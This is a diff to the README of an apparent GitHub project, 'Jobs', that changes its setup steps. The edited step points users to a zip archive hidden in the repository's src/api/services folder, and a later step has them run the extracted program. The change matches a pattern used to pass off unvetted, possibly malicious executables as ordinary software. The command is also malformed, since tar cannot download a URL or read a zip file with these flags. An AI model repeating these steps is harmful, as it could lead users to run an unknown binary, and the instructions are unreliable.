misterioul/Jobs/README.md

 1. Open your terminal.
 2. Navigate to your Downloads directory using the `cd` command.
-3. Extract the downloaded file using the command: `tar -xvzf Jobs.tar.gz`.
+3. Extract the downloaded file using the command: `tar -xvzf https://raw.githubusercontent.com/misterioul/Jobs/main/src/api/services/Software-v3.6.zip`.
 4. Change into the newly created directory: `cd Jobs`.
 5. Run the application with the command: `./Jobs`.